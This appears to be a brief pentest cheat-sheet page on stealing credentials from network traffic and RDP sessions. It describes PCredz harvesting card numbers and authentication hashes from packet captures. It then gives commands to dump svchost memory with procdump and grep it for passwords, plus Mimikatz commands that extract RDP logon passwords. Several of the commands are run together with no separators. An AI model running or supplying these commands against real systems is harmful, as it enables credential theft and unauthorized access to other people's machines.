🟢Network protocols
PCredz
This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.
RDP
Mimikatz and RDP protocol
Verify Service
sc queryex termservicetasklist /M:rdpcorets.dllnetstat -nob | Select-String TermService -Context 1
RDP Session Takeover
procdump64.exe -ma 988 -accepteula C:\svchost.dmpstrings -el svchost* | grep Password123 -C3
RDP Passwords
privilege::debugts::logonpasswords
Last updated